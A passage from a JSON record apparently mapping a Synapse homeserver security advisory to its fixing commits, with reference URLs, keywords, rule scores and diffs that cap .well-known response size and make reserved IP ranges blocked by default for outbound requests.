"https://github.com/matrix-org/synapse/pull/8971": 3, - "https://github.com/matrix-org/synapse/pull/8975": 3, - "https://github.com/matrix-org/synapse/pull/8977": 3, - "https://github.com/matrix-org/synapse/pull/8802": 3, - "https://github.com/matrix-org/synapse/pull/8839": 3, - "https://github.com/matrix-org/synapse/pull/8873": 3, - "https://github.com/matrix-org/synapse/pull/8891": 3, - "https://github.com/matrix-org/synapse/pull/8987": 3, - "https://github.com/matrix-org/synapse/pull/8992": 3, - "https://github.com/matrix-org/synapse/pull/9002": 3, - "https://github.com/matrix-org/synapse/pull/8829": 3, - "https://github.com/matrix-org/synapse/pull/8856": 3, - "https://github.com/matrix-org/synapse/pull/8958": 3, - "https://github.com/matrix-org/synapse/pull/8861": 3, - "https://github.com/matrix-org/synapse/pull/8864": 3, - "https://github.com/matrix-org/synapse/pull/8879": 3, - "https://github.com/matrix-org/synapse/pull/8880": 3, - "https://github.com/matrix-org/synapse/pull/8882": 3, - "https://github.com/matrix-org/synapse/pull/8901": 3, - "https://github.com/matrix-org/synapse/pull/8940": 3, - "https://github.com/matrix-org/synapse/pull/8943": 3, - "https://github.com/matrix-org/synapse/pull/9020": 3, - "https://github.com/matrix-org/synapse/pull/8881": 3, - "https://github.com/matrix-org/synapse/pull/8905": 3, - "https://github.com/matrix-org/synapse/pull/8906": 3, - "https://github.com/matrix-org/synapse/pull/8909": 3, - "https://github.com/matrix-org/synapse/pull/8916": 3, - "https://github.com/matrix-org/synapse/pull/8935": 3, - "https://github.com/matrix-org/synapse/pull/8929": 3, - "https://github.com/matrix-org/synapse/pull/8946": 3, - "https://github.com/matrix-org/synapse/pull/8952": 3, - "https://github.com/matrix-org/synapse/pull/8963": 3, - "https://github.com/matrix-org/synapse/pull/8973": 3, - "https://github.com/matrix-org/synapse/pull/8976": 3, - "https://github.com/matrix-org/synapse/pull/8979": 3, - "https://github.com/matrix-org/synapse/pull/8980": 3, - "https://github.com/matrix-org/synapse/pull/8986": 3, - "https://github.com/matrix-org/synapse/pull/8998": 3, - "https://github.com/matrix-org/synapse/pull/8999": 3, - "https://github.com/matrix-org/synapse/releases/tag/v1.25.0": 2, - "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TNNAJOZNMVMXM6AS7RFFKB4QLUJ4IFEY/": 2, - "https://endoflife.date/": 2, - "https://endoflife.date/python": 2, - "https://endoflife.date/postgresql": 2, - "https://github.com/Bubu": 2, - "https://github.com/fossterer": 2, - "https://github.com/matrix-org/synapse/pull/9108": 1, - "https://github.com/matrix-org/synapse/issues/9084": 1, - "https://github.com/matrix-org/synapse/issues/8756": 1, - "https://github.com/matrix-org/synapse/issues/8853": 1, - "https://github.com/matrix-org/synapse/issues/8874": 1, - "https://github.com/matrix-org/synapse/issues/8886": 1, - "https://github.com/matrix-org/synapse/issues/8887": 1, - "https://github.com/matrix-org/synapse/issues/8890": 1, - "https://github.com/matrix-org/synapse/issues/8897": 1, - "https://github.com/matrix-org/synapse/issues/8900": 1, - "https://github.com/matrix-org/synapse/issues/8911": 1, - "https://github.com/matrix-org/synapse/issues/8938": 1, - "https://github.com/matrix-org/synapse/issues/8941": 1, - "https://github.com/matrix-org/synapse/issues/8942": 1, - "https://github.com/matrix-org/synapse/issues/8951": 1, - "https://github.com/matrix-org/synapse/issues/8930": 1, - "https://github.com/matrix-org/synapse/issues/8931": 1, - "https://github.com/matrix-org/synapse/issues/8821": 1, - "https://github.com/matrix-org/synapse/issues/8870": 1, - "https://github.com/matrix-org/synapse/issues/8954": 1, - "https://github.com/matrix-org/synapse/issues/8970": 1, - "https://github.com/matrix-org/synapse/issues/8994": 1, - "https://github.com/matrix-org/synapse/issues/8827": 1, - "https://github.com/matrix-org/synapse/issues/8837": 1, - "https://github.com/matrix-org/synapse/issues/8858": 1, - "https://github.com/matrix-org/synapse/issues/8862": 1, - "https://github.com/matrix-org/synapse/issues/8865": 1, - "https://github.com/matrix-org/synapse/issues/8867": 1, - "https://github.com/matrix-org/synapse/issues/8872": 1, - "https://github.com/matrix-org/synapse/issues/8883": 1, - "https://github.com/matrix-org/synapse/issues/8918": 1, - "https://github.com/matrix-org/synapse/issues/8920": 1, - "https://github.com/matrix-org/synapse/issues/8921": 1, - "https://github.com/matrix-org/synapse/issues/8933": 1, - "https://github.com/matrix-org/synapse/issues/8964": 1, - "https://github.com/matrix-org/synapse/issues/8937": 1, - "https://github.com/matrix-org/synapse/issues/8945": 1, - "https://github.com/matrix-org/synapse/issues/8959": 1, - "https://github.com/matrix-org/synapse/issues/8962": 1, - "https://github.com/matrix-org/synapse/issues/8965": 1, - "https://github.com/matrix-org/synapse/issues/8971": 1, - "https://github.com/matrix-org/synapse/issues/8975": 1, - "https://github.com/matrix-org/synapse/issues/8977": 1, - "https://github.com/matrix-org/synapse/issues/8802": 1, - "https://github.com/matrix-org/synapse/issues/8839": 1, - "https://github.com/matrix-org/synapse/issues/8873": 1, - "https://github.com/matrix-org/synapse/issues/8891": 1, - "https://github.com/matrix-org/synapse/issues/8987": 1, - "https://github.com/matrix-org/synapse/issues/8992": 1, - "https://github.com/matrix-org/synapse/issues/9002": 1, - "https://github.com/matrix-org/synapse/issues/8829": 1, - "https://github.com/matrix-org/synapse/issues/8856": 1, - "https://github.com/matrix-org/synapse/issues/8958": 1, - "https://github.com/matrix-org/synapse/issues/8861": 1, - "https://github.com/matrix-org/synapse/issues/8864": 1, - "https://github.com/matrix-org/synapse/issues/8879": 1, - "https://github.com/matrix-org/synapse/issues/8880": 1, - "https://github.com/matrix-org/synapse/issues/8882": 1, - "https://github.com/matrix-org/synapse/issues/8901": 1, - "https://github.com/matrix-org/synapse/issues/8940": 1, - "https://github.com/matrix-org/synapse/issues/8943": 1, - "https://github.com/matrix-org/synapse/issues/9020": 1, - "https://github.com/matrix-org/synapse/issues/8881": 1, - "https://github.com/matrix-org/synapse/issues/8905": 1, - "https://github.com/matrix-org/synapse/issues/8906": 1, - "https://github.com/matrix-org/synapse/issues/8909": 1, - "https://github.com/matrix-org/synapse/issues/8916": 1, - "https://github.com/matrix-org/synapse/issues/8935": 1, - "https://github.com/matrix-org/synapse/issues/8929": 1, - "https://github.com/matrix-org/synapse/issues/8946": 1, - "https://github.com/matrix-org/synapse/issues/8950": 1, - "https://github.com/matrix-org/synapse/issues/8952": 1, - "https://github.com/matrix-org/synapse/issues/8963": 1, - "https://github.com/matrix-org/synapse/issues/8973": 1, - "https://github.com/matrix-org/synapse/issues/8976": 1, - "https://github.com/matrix-org/synapse/issues/8979": 1, - "https://github.com/matrix-org/synapse/issues/8980": 1, - "https://github.com/matrix-org/synapse/issues/8986": 1, - "https://github.com/matrix-org/synapse/issues/8998": 1, - "https://github.com/matrix-org/synapse/issues/8999": 1, - "https://github.co/hiddenchars": 1, - "https://github.com/matrix-org/synapse/pull/8950#event-4122091867": 1, - "https://github.com/matrix-org/synapse/pull/9084": 1, - "https://pagure.io/fedora-infrastructure/issue/12043": 1, - "https://github.com/matrix-org/synapse": 1, - "https://github.com/matrix-": 1, - "https://fedoraproject.org/wiki/Fedora_35_Mass_Rebuild": 1, - "https://pagure.io/fesco/issue/2583": 1, - "https://bugzilla.redhat.com/show_bug.cgi?id=1910740": 1, - "https://bugzilla.redhat.com/show_bug.cgi?id=1918426": 1, - "https://bugzilla.redhat.com/show_bug.cgi?id=1934603": 1, - "https://bugzilla.redhat.com/show_bug.cgi?id=1934606": 1, - "https://bugzilla.redhat.com/show_bug.cgi?id=1944136": 1, - "https://bugzilla.redhat.com/show_bug.cgi?id=1944139": 1, - "https://bugzilla.redhat.com/show_bug.cgi?id=1949110": 1, - "https://bugzilla.redhat.com/show_bug.cgi?id=1949112": 1, - "https://bugzilla.redhat.com/show_bug.cgi?id=1958801": 1, - "https://bugzilla.redhat.com/show_bug.cgi?id=1959542": 1, - "http://dnf.readthedocs.io/en/latest/command_ref.html#upgrade-command-label": 1, - "https://fedoraproject.org/keys": 1, - "http://hyperkitty.readthedocs.org": 1 - }, - "affected_products": [ - "Messaging", - "python", - "synapse", - "VoIP", - "Instant", - "Matrix" - ], - "versions": { - "status": "affected", - "version": ">=0.99.0, < 1.25.0" - }, - "files": [ - "well-known", - "VoIP", - "federation_domain_whitelist", - "matrix-synapse" - ], - "keywords": [ - "redirect", - "federate", - "service", - "request", - "synapse", - "messaging", - "federation", - "setting", - "denial", - "know", - "resource", - "issue", - "python", - "matrix", - "file", - "lead", - "write", - "attack", - "version", - "ecosystem", - "pypi", - "voip", - "restrict", - "homeserver", - "consume", - "workaround", - "instant", - "reference", - "accept", - "package", - "affect", - "resolve", - "server", - "communicate" - ], - "files_extension": [], - "has_fixing_commit": true - }, - "commits": [ - { - "commit_id": "ff5c4da1289cb5e097902b3e55b771be342c29d6", - "repository": "https://github.com/matrix-org/synapse", - "timestamp": 1608157524, - "hunks": 23, - "message": "Add a maximum size for well-known lookups. (#8950)", - "diff": [ - "diff --git a/changelog.d/8950.misc b/changelog.d/8950.misc", - "new file mode 100644", - "index 000000000..42e0335af", - "--- /dev/null", - "+++ b/changelog.d/8950.misc", - "@@ -0,0 +1 @@", - "+Add a maximum size of 50 kilobytes to .well-known lookups.", - "diff --git a/synapse/http/client.py b/synapse/http/client.py", - "index df7730078..29f40ddf5 100644", - "--- a/synapse/http/client.py", - "+++ b/synapse/http/client.py", - "@@ -722,7 +722,10 @@ class SimpleHttpClient:", - " length = await make_deferred_yieldable(", - "- readBodyToFile(response, output_stream, max_size)", - "+ read_body_with_max_size(response, output_stream, max_size)", - "+ )", - "+ except BodyExceededMaxSize:", - "+ SynapseError(", - "+ 502,", - "+ \"Requested file is too large > %r bytes\" % (max_size,),", - "+ Codes.TOO_LARGE,", - " )", - "- except SynapseError:", - "- # This can happen e.g. because the body is too large.", - "- raise", - " except Exception as e:", - "@@ -750,3 +753,7 @@ def _timeout_to_request_timed_out_error(f: Failure):", - "-class _ReadBodyToFileProtocol(protocol.Protocol):", - "+class BodyExceededMaxSize(Exception):", - "+ \"\"\"The maximum allowed size of the HTTP body was exceeded.\"\"\"", - "+", - "+", - "+class _ReadBodyWithMaxSizeProtocol(protocol.Protocol):", - " def __init__(", - "@@ -763,9 +770,3 @@ class _ReadBodyToFileProtocol(protocol.Protocol):", - " if self.max_size is not None and self.length >= self.max_size:", - "- self.deferred.errback(", - "- SynapseError(", - "- 502,", - "- \"Requested file is too large > %r bytes\" % (self.max_size,),", - "- Codes.TOO_LARGE,", - "- )", - "- )", - "+ self.deferred.errback(BodyExceededMaxSize())", - " self.deferred = defer.Deferred()", - "@@ -784,3 +785,3 @@ class _ReadBodyToFileProtocol(protocol.Protocol):", - "-def readBodyToFile(", - "+def read_body_with_max_size(", - " response: IResponse, stream: BinaryIO, max_size: Optional[int]", - "@@ -790,2 +791,5 @@ def readBodyToFile(", - "+ If the maximum file size is reached, the returned Deferred will resolve to a", - "+ Failure with a BodyExceededMaxSize exception.", - "+", - " Args:", - "@@ -800,3 +804,3 @@ def readBodyToFile(", - " d = defer.Deferred()", - "- response.deliverBody(_ReadBodyToFileProtocol(stream, d, max_size))", - "+ response.deliverBody(_ReadBodyWithMaxSizeProtocol(stream, d, max_size))", - " return d", - "diff --git a/synapse/http/federation/well_known_resolver.py b/synapse/http/federation/well_known_resolver.py", - "index 5e08ef166..b3b6dbcab 100644", - "--- a/synapse/http/federation/well_known_resolver.py", - "+++ b/synapse/http/federation/well_known_resolver.py", - "@@ -17,2 +17,3 @@ import random", - " import time", - "+from io import BytesIO", - " from typing import Callable, Dict, Optional, Tuple", - "@@ -23,3 +24,3 @@ from twisted.internet import defer", - " from twisted.internet.interfaces import IReactorTime", - "-from twisted.web.client import RedirectAgent, readBody", - "+from twisted.web.client import RedirectAgent", - " from twisted.web.http import stringToDatetime", - "@@ -28,2 +29,3 @@ from twisted.web.iweb import IAgent, IResponse", - "+from synapse.http.client import BodyExceededMaxSize, read_body_with_max_size", - " from synapse.logging.context import make_deferred_yieldable", - "@@ -55,2 +57,5 @@ WELL_KNOWN_MIN_CACHE_PERIOD = 5 * 60", - "+# The maximum size (in bytes) to allow a well-known file to be.", - "+WELL_KNOWN_MAX_SIZE = 50 * 1024 # 50 KiB", - "+", - " # Attempt to refetch a cached well-known N% of the TTL before it expires.", - "@@ -231,2 +236,5 @@ class WellKnownResolver:", - "+ Raises:", - "+ _FetchWellKnownFailure if we fail to lookup a result", - "+", - " Returns:", - "@@ -252,3 +260,7 @@ class WellKnownResolver:", - " )", - "- body = await make_deferred_yieldable(readBody(response))", - "+ body_stream = BytesIO()", - "+ await make_deferred_yieldable(", - "+ read_body_with_max_size(response, body_stream, WELL_KNOWN_MAX_SIZE)", - "+ )", - "+ body = body_stream.getvalue()", - "@@ -261,2 +273,11 @@ class WellKnownResolver:", - " raise", - "+ except BodyExceededMaxSize:", - "+ # If the well-known file was too large, do not keep attempting", - "+ # to download it, but consider it a temporary error.", - "+ logger.warning(", - "+ \"Requested .well-known file for %s is too large > %r bytes\",", - "+ server_name.decode(\"ascii\"),", - "+ WELL_KNOWN_MAX_SIZE,", - "+ )", - "+ raise _FetchWellKnownFailure(temporary=True)", - " except Exception as e:", - "diff --git a/synapse/http/matrixfederationclient.py b/synapse/http/matrixfederationclient.py", - "index c96299472..b261e078c 100644", - "--- a/synapse/http/matrixfederationclient.py", - "+++ b/synapse/http/matrixfederationclient.py", - "@@ -39,2 +39,3 @@ import synapse.util.retryutils", - " from synapse.api.errors import (", - "+ Codes,", - " FederationDeniedError,", - "@@ -42,2 +43,3 @@ from synapse.api.errors import (", - " RequestSendFailed,", - "+ SynapseError,", - " )", - "@@ -47,4 +49,5 @@ from synapse.http.client import (", - " BlacklistingReactorWrapper,", - "+ BodyExceededMaxSize,", - " encode_query_args,", - "- readBodyToFile,", - "+ read_body_with_max_size,", - " )", - "@@ -977,5 +980,11 @@ class MatrixFederationHttpClient:", - " try:", - "- d = readBodyToFile(response, output_stream, max_size)", - "+ d = read_body_with_max_size(response, output_stream, max_size)", - " d.addTimeout(self.default_timeout, self.reactor)", - " length = await make_deferred_yieldable(d)", - "+ except BodyExceededMaxSize:", - "+ msg = \"Requested file is too large > %r bytes\" % (max_size,)", - "+ logger.warning(", - "+ \"{%s} [%s] %s\", request.txn_id, request.destination, msg,", - "+ )", - "+ SynapseError(502, msg, Codes.TOO_LARGE)", - " except Exception as e:", - "diff --git a/tests/http/federation/test_matrix_federation_agent.py b/tests/http/federation/test_matrix_federation_agent.py", - "index 626acdcaa..4e51839d0 100644", - "--- a/tests/http/federation/test_matrix_federation_agent.py", - "+++ b/tests/http/federation/test_matrix_federation_agent.py", - "@@ -38,2 +38,3 @@ from synapse.http.federation.srv_resolver import Server", - " from synapse.http.federation.well_known_resolver import (", - "+ WELL_KNOWN_MAX_SIZE,", - " WellKnownResolver,", - "@@ -1109,2 +1110,28 @@ class MatrixFederationAgentTests(unittest.TestCase):", - "+ def test_well_known_too_large(self):", - "+ \"\"\"A well-known query that returns a result which is too large should be rejected.\"\"\"", - "+ self.reactor.lookups[\"testserv\"] = \"1.2.3.4\"", - "+", - "+ fetch_d = defer.ensureDeferred(", - "+ self.well_known_resolver.get_well_known(b\"testserv\")", - "+ )", - "+", - "+ # there should be an attempt to connect on port 443 for the .well-known", - "+ clients = self.reactor.tcpClients", - "+ self.assertEqual(len(clients), 1)", - "+ (host, port, client_factory, _timeout, _bindAddress) = clients.pop(0)", - "+ self.assertEqual(host, \"1.2.3.4\")", - "+ self.assertEqual(port, 443)", - "+", - "+ self._handle_well_known_connection(", - "+ client_factory,", - "+ expected_sni=b\"testserv\",", - "+ response_headers={b\"Cache-Control\": b\"max-age=1000\"},", - "+ content=b'{ \"m.server\": \"' + (b\"a\" * WELL_KNOWN_MAX_SIZE) + b'\" }',", - "+ )", - "+", - "+ # The result is sucessful, but disabled delegation.", - "+ r = self.successResultOf(fetch_d)", - "+ self.assertIsNone(r.delegated_server)", - "+", - " def test_srv_fallbacks(self):" - ], - "changed_files": [ - "changelog.d/8950.misc", - "synapse/http/client.py", - "synapse/http/federation/well_known_resolver.py", - "synapse/http/matrixfederationclient.py", - "tests/http/federation/test_matrix_federation_agent.py" - ], - "message_reference_content": [], - "jira_refs": {}, - "ghissue_refs": { - "8950": "UnboundLocalError raised when response body exceeds max size #9132 MSC2499: Fixes for Well-known URIs matrix-org/matrix-spec-proposals#2499" - }, - "cve_refs": [], - "twins": [], - "tags": [ - "v1.25.0", - "v1.25.0rc1", - "v1.26.0", - "v1.26.0-deb", - "v1.26.0rc1", - "v1.26.0rc2", - "v1.27.0", - "v1.27.0rc1", - "v1.27.0rc2", - "v1.28.0", - "v1.28.0rc1", - "v1.29.0", - "v1.29.0rc1", - "v1.30.0", - "v1.30.0rc1", - "v1.30.1", - "v1.31.0", - "v1.31.0rc1", - "v1.32.0", - "v1.32.0rc1", - "v1.32.1", - "v1.32.2", - "v1.33.0", - "v1.33.0rc1", - "v1.33.0rc2", - "v1.33.1", - "v1.33.2", - "v1.34.0", - "v1.34.0rc1", - "v1.35.0", - "v1.35.0rc1", - "v1.35.0rc2", - "v1.35.0rc3", - "v1.35.1", - "v1.36.0", - "v1.36.0rc1", - "v1.36.0rc2", - "v1.37.0", - "v1.37.0rc1", - "v1.37.1", - "v1.37.1a1", - "v1.37.1rc1", - "v1.38.0", - "v1.38.0rc1", - "v1.38.0rc2", - "v1.38.0rc3", - "v1.38.1", - "v1.39.0", - "v1.39.0rc1", - "v1.39.0rc2", - "v1.39.0rc3", - "v1.40.0", - "v1.40.0rc1", - "v1.40.0rc2", - "v1.40.0rc3", - "v1.41.0", - "v1.41.0rc1", - "v1.41.1", - "v1.42.0", - "v1.42.0rc1", - "v1.42.0rc2", - "v1.43.0", - "v1.43.0rc1", - "v1.43.0rc2", - "v1.44.0", - "v1.44.0rc1", - "v1.44.0rc2", - "v1.44.0rc3", - "v1.45.0", - "v1.45.0rc1", - "v1.45.0rc2", - "v1.45.1", - "v1.46-modular1", - "v1.46.0", - "v1.46.0rc1", - "v1.47.0", - "v1.47.0rc1", - "v1.47.0rc2", - "v1.47.0rc3", - "v1.47.1", - "v1.48.0", - "v1.48.0rc1", - "v1.49.0", - "v1.49.0rc1", - "v1.49.1", - "v1.49.2", - "v1.50.0", - "v1.50.0rc1", - "v1.50.0rc2", - "v1.50.1", - "v1.50.2", - "v1.51.0", - "v1.51.0rc1", - "v1.51.0rc2", - "v1.52.0", - "v1.52.0rc1", - "v1.53.0", - "v1.53.0rc1", - "v1.54.0", - "v1.54.0rc1", - "v1.55.0", - "v1.55.0rc1", - "v1.55.1", - "v1.55.2", - "v1.56.0", - "v1.56.0rc1", - "v1.57.0", - "v1.57.0rc1", - "v1.57.1", - "v1.58.0", - "v1.58.0rc1", - "v1.58.0rc2", - "v1.58.1", - "v1.59.0", - "v1.59.0rc1", - "v1.59.0rc2", - "v1.59.1", - "v1.60.0", - "v1.60.0rc1", - "v1.60.0rc2", - "v1.61.0", - "v1.61.0rc1", - "v1.61.1", - "v1.62.0", - "v1.62.0rc1", - "v1.62.0rc2", - "v1.62.0rc3", - "v1.63.0", - "v1.63.0rc1", - "v1.63.1", - "v1.64.0", - "v1.64.0rc1", - "v1.64.0rc2", - "v1.65.0", - "v1.65.0.post1.dev1", - "v1.65.0rc1", - "v1.65.0rc2", - "v1.66.0", - "v1.66.0rc1", - "v1.66.0rc2", - "v1.67.0", - "v1.67.0rc1", - "v1.68.0", - "v1.68.0rc1", - "v1.68.0rc2", - "v1.69.0", - "v1.69.0rc1", - "v1.69.0rc2", - "v1.69.0rc3", - "v1.69.0rc4", - "v1.70.0", - "v1.70.0rc1", - "v1.70.0rc2", - "v1.70.1", - "v1.71.0", - "v1.71.0rc1", - "v1.71.0rc2", - "v1.72.0", - "v1.72.0rc1", - "v1.73.0", - "v1.73.0rc1", - "v1.73.0rc2", - "v1.74.0", - "v1.74.0rc1", - "v1.75.0", - "v1.75.0rc1", - "v1.75.0rc2", - "v1.76.0", - "v1.76.0rc1", - "v1.76.0rc2", - "v1.77.0", - "v1.77.0rc1", - "v1.77.0rc2", - "v1.78.0", - "v1.78.0rc1", - "v1.79.0", - "v1.79.0rc1", - "v1.79.0rc2", - "v1.80.0", - "v1.80.0rc1", - "v1.80.0rc2", - "v1.81.0", - "v1.81.0rc1", - "v1.81.0rc2", - "v1.82.0", - "v1.82.0rc1", - "v1.83.0", - "v1.83.0rc1", - "v1.84.0", - "v1.84.0rc1", - "v1.84.1", - "v1.85.0", - "v1.85.0rc1", - "v1.85.0rc2", - "v1.85.1", - "v1.85.2", - "v1.86.0", - "v1.86.0rc1", - "v1.86.0rc2", - "v1.87.0", - "v1.87.0rc1", - "v1.88.0", - "v1.88.0rc1", - "v1.89.0", - "v1.89.0rc1", - "v1.90.0", - "v1.90.0rc1", - "v1.91.0", - "v1.91.0rc1", - "v1.91.1", - "v1.91.2", - "v1.92.0", - "v1.92.0rc1", - "v1.92.1", - "v1.92.2", - "v1.92.3", - "v1.93.0", - "v1.93.0rc1", - "v1.94.0", - "v1.94.0rc1", - "v1.95.0", - "v1.95.0rc1", - "v1.95.1", - "v1.96.0", - "v1.96.0rc1", - "v1.96.1", - "v1.97.0", - "v1.97.0rc1", - "v1.98.0", - "v1.98.0rc1" - ], - "matched_rules": [ - { - "id": "COMMIT_IS_SECURITY_RELEVANT", - "message": "", - "relevance": 32 - }, - { - "id": "XREF_GH", - "message": "The commit and the advisory (including referenced pages) mention the same github issue: 8950, 8950", - "relevance": 32 - }, - { - "id": "COMMIT_IN_REFERENCE", - "message": "This commit is mentioned 7 times in the references.", - "relevance": 64 - }, - { - "id": "RELEVANT_WORDS_IN_MESSAGE", - "message": "The commit message contains some relevant words: well-known", - "relevance": 8 - }, - { - "id": "CHANGES_RELEVANT_CODE", - "message": "The commit modifies code containing relevant filename or methods: well-known", - "relevance": 8 - }, - { - "id": "ADV_KEYWORDS_IN_MSG", - "message": "The commit message and the advisory description contain the following keywords: know", - "relevance": 4 - }, - { - "id": "ADV_KEYWORDS_IN_FILES", - "message": "An advisory keyword is contained in the changed files: resolve, federation, know", - "relevance": 4 - }, - { - "id": "GITHUB_ISSUE_IN_MESSAGE", - "message": "The commit message references some github issue: 8950", - "relevance": 2 - } - ] - }, - { - "commit_id": "344ab0b53abc0291d79882f8bdc1a853f7495ed4", - "repository": "https://github.com/matrix-org/synapse", - "timestamp": 1607540166, - "hunks": 27, - "message": "Default to blacklisting reserved IP ranges and add a whitelist. (#8870) This defaults `ip_range_blacklist` to reserved IP ranges and also adds an `ip_range_whitelist` setting to override it.", - "diff": [ - "diff --git a/changelog.d/8821.bugfix b/changelog.d/8821.bugfix", - "index 8ddfbf31c..39f53174a 100644", - "--- a/changelog.d/8821.bugfix", - "+++ b/changelog.d/8821.bugfix", - "@@ -1 +1 @@", - "-Apply the `federation_ip_range_blacklist` to push and key revocation requests.", - "+Apply an IP range blacklist to push and key revocation requests.", - "diff --git a/changelog.d/8870.bugfix b/changelog.d/8870.bugfix", - "new file mode 100644", - "index 000000000..39f53174a", - "--- /dev/null", - "+++ b/changelog.d/8870.bugfix", - "@@ -0,0 +1 @@", - "+Apply an IP range blacklist to push and key revocation requests.", - "diff --git a/docs/sample_config.yaml b/docs/sample_config.yaml", - "index 68c8f4f0e..f196781c1 100644", - "--- a/docs/sample_config.yaml", - "+++ b/docs/sample_config.yaml", - "@@ -146,2 +146,31 @@ pid_file: DATADIR/homeserver.pid", - "+# Prevent outgoing requests from being sent to the following blacklisted IP address", - "+# CIDR ranges. If this option is not specified then it defaults to private IP", - "+# address ranges (see the example below).", - "+#", - "+# The blacklist applies to the outbound requests for federation, identity servers,", - "+# push servers, and for checking key validity for third-party invite events.", - "+#", - "+# (0.0.0.0 and :: are always blacklisted, whether or not they are explicitly", - "+# listed here, since they correspond to unroutable addresses.)", - "+#", - "+# This option replaces federation_ip_range_blacklist in Synapse v1.25.0.", - "+#", - "+#ip_range_blacklist:", - "+# - '127.0.0.0/8'", - "+# - '10.0.0.0/8'", - "+# - '172.16.0.0/12'", - "+# - '192.168.0.0/16'", - "+# - '100.64.0.0/10'", - "+# - '192.0.0.0/24'", - "+# - '169.254.0.0/16'", - "+# - '198.18.0.0/15'", - "+# - '192.0.2.0/24'", - "+# - '198.51.100.0/24'", - "+# - '203.0.113.0/24'", - "+# - '224.0.0.0/4'", - "+# - '::1/128'", - "+# - 'fe80::/10'", - "+# - 'fc00::/7'", - "+", - " # List of ports that Synapse should listen on, their purpose and their", - "@@ -644,24 +673,13 @@ acme:", - "-# Prevent outgoing requests from being sent to the following blacklisted IP address", - "-# CIDR ranges. If this option is not specified, or specified with an empty list,", - "-# no IP range blacklist will be enforced.", - "+# List of IP address CIDR ranges that should be allowed for federation,", - "+# identity servers, push servers, and for checking key validity for", - "+# third-party invite events. This is useful for specifying exceptions to", - "+# wide-ranging blacklisted target IP ranges - e.g. for communication with", - "+# a push server only visible in your network.", - " #", - "-# The blacklist applies to the outbound requests for federation, identity servers,", - "-# push servers, and for checking key validitity for third-party invite events.", - "-#", - "-# (0.0.0.0 and :: are always blacklisted, whether or not they are explicitly", - "-# listed here, since they correspond to unroutable addresses.)", - "-#", - "-# This option replaces federation_ip_range_blacklist in Synapse v1.24.0.", - "+# This whitelist overrides ip_range_blacklist and defaults to an empty", - "+# list.", - " #", - "-ip_range_blacklist:", - "- - '127.0.0.0/8'", - "- - '10.0.0.0/8'", - "- - '172.16.0.0/12'", - "- - '192.168.0.0/16'", - "- - '100.64.0.0/10'", - "- - '169.254.0.0/16'", - "- - '::1/128'", - "- - 'fe80::/64'", - "- - 'fc00::/7'", - "+#ip_range_whitelist:", - "+# - '192.168.1.1'", - "@@ -957,5 +975,11 @@ media_store_path: \"DATADIR/media_store\"", - " # - '100.64.0.0/10'", - "+# - '192.0.0.0/24'", - " # - '169.254.0.0/16'", - "+# - '198.18.0.0/15'", - "+# - '192.0.2.0/24'", - "+# - '198.51.100.0/24'", - "+# - '203.0.113.0/24'", - "+# - '224.0.0.0/4'", - " # - '::1/128'", - "-# - 'fe80::/64'", - "+# - 'fe80::/10'", - " # - 'fc00::/7'", - "diff --git a/synapse/config/federation.py b/synapse/config/federation.py", - "index 27ccf61c3..a03a419e2 100644", - "--- a/synapse/config/federation.py", - "+++ b/synapse/config/federation.py", - "@@ -14,8 +14,5 @@", - " # limitations under the License.", - "-", - " from typing import Optional", - "-from netaddr import IPSet", - "-", - "-from synapse.config._base import Config, ConfigError", - "+from synapse.config._base import Config", - " from synapse.config._util import validate_config", - "@@ -38,27 +35,2 @@ class FederationConfig(Config):", - "- ip_range_blacklist = config.get(\"ip_range_blacklist\", [])", - "-", - "- # Attempt to create an IPSet from the given ranges", - "- try:", - "- self.ip_range_blacklist = IPSet(ip_range_blacklist)", - "- except Exception as e:", - "- raise ConfigError(\"Invalid range(s) provided in ip_range_blacklist: %s\" % e)", - "- # Always blacklist 0.0.0.0, ::", - "- self.ip_range_blacklist.update([\"0.0.0.0\", \"::\"])", - "-", - "- # The federation_ip_range_blacklist is used for backwards-compatibility", - "- # and only applies to federation and identity servers. If it is not given,", - "- # default to ip_range_blacklist.", - "- federation_ip_range_blacklist = config.get(", - "- \"federation_ip_range_blacklist\", ip_range_blacklist", - "- )", - "- try:", - "- self.federation_ip_range_blacklist = IPSet(federation_ip_range_blacklist)", - "- except Exception as e:", - "- raise ConfigError(", - "- \"Invalid range(s) provided in federation_ip_range_blacklist: %s\" % e", - "- )", - "- # Always blacklist 0.0.0.0, ::", - "- self.federation_ip_range_blacklist.update([\"0.0.0.0\", \"::\"])", - "-", - " federation_metrics_domains = config.get(\"federation_metrics_domains\") or []", - "@@ -86,24 +58,13 @@ class FederationConfig(Config):", - "- # Prevent outgoing requests from being sent to the following blacklisted IP address", - "- # CIDR ranges. If this option is not specified, or specified with an empty list,", - "- # no IP range blacklist will be enforced.", - "- #", - "- # The blacklist applies to the outbound requests for federation, identity servers,", - "- # push servers, and for checking key validitity for third-party invite events.", - "- #", - "- # (0.0.0.0 and :: are always blacklisted, whether or not they are explicitly", - "- # listed here, since they correspond to unroutable addresses.)", - "+ # List of IP address CIDR ranges that should be allowed for federation,", - "+ # identity servers, push servers, and for checking key validity for", - "+ # third-party invite events. This is useful for specifying exceptions to", - "+ # wide-ranging blacklisted target IP ranges - e.g. for communication with", - "+ # a push server only visible in your network.", - " #", - "- # This option replaces federation_ip_range_blacklist in Synapse v1.24.0.", - "+ # This whitelist overrides ip_range_blacklist and defaults to an empty", - "+ # list.", - " #", - "- ip_range_blacklist:", - "- - '127.0.0.0/8'", - "- - '10.0.0.0/8'", - "- - '172.16.0.0/12'", - "- - '192.168.0.0/16'", - "- - '100.64.0.0/10'", - "- - '169.254.0.0/16'", - "- - '::1/128'", - "- - 'fe80::/64'", - "- - 'fc00::/7'", - "+ #ip_range_whitelist:", - "+ # - '192.168.1.1'", - "diff --git a/synapse/config/repository.py b/synapse/config/repository.py", - "index 17ce9145e..850ac3ebd 100644", - "--- a/synapse/config/repository.py", - "+++ b/synapse/config/repository.py", - "@@ -19,2 +19,5 @@ from typing import Dict, List", - "+from netaddr import IPSet", - "+", - "+from synapse.config.server import DEFAULT_IP_RANGE_BLACKLIST", - " from synapse.python_dependencies import DependencyException, check_requirements", - "@@ -186,5 +189,2 @@ class ContentRepositoryConfig(Config):", - "- # netaddr is a dependency for url_preview", - "- from netaddr import IPSet", - "-", - " self.url_preview_ip_range_blacklist = IPSet(", - "@@ -217,2 +217,6 @@ class ContentRepositoryConfig(Config):", - "+ ip_range_blacklist = \"\\n\".join(", - "+ \" # - '%s'\" % ip for ip in DEFAULT_IP_RANGE_BLACKLIST", - "+ )", - "+", - " return (", - "@@ -287,11 +291,3 @@ 